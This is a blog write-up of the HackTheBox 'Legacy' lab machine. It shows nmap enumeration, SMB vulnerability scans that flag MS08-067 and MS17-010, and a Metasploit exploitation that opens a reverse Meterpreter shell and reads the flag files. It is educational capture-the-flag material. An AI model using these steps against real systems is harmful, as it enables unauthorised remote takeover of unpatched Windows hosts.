Posts HackTheBox - Legacy

HackTheBox - Legacy

As the oldest machine on HackTheBox, i thought Legacy would be the perfect machine to start with. It was a nice and easy first box - requiring simple enumeration following a simple SMB vulnerability exploit to gain root access.

Machine IP =



Starting Nmap 7.80 ( ) at 2020-07-19 12:04 BST
Nmap scan report for
Host is up (0.055s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h31m22s, deviation: 2h07m16s, median: 4d23h01m22s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: unknown, NetBIOS MAC: 00:50:56:b9:47:5e (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-07-24T16:05:41+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 63.16 seconds

An old machine, running Windows XP 2000. SMB is discovered on port 139. Time to delve deeper. Scan for SMB vulnerabilities on port 139.

root@kali:~# nmap --script smb-vuln* -p 139
Starting Nmap 7.80 ( ) at 2020-07-19 12:23 BST
Nmap scan report for
Host is up (0.052s latency).

139/tcp open  netbios-ssn

Host script results:
| smb-vuln-ms08-067: 
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|     Disclosure date: 2008-10-23
|     References:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Two CVE’s returned:

  • CVE-2008-4250 - smb-vuln-ms08-067
  • CVE-2017-0143 - smb-vuln-ms17-010

Now onto Metasploit to gain access to machine.



msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file: path'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to
[*] Meterpreter session 1 opened ( -> at 2020-07-19 12:31:48 +0100

meterpreter > 
meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

It seems we have access to the machine! Time to find some flags.

C:\Documents and Settings\john\Desktop>type user.txt

C:\Documents and Settings\Administrator\Desktop>type root.txt	

First machine completed! Although there is another option to exloit via ms17-010, the results would be the same. Was a nice easy machine to say the least. Onto the next!

This post is licensed under CC BY 4.0 by the author.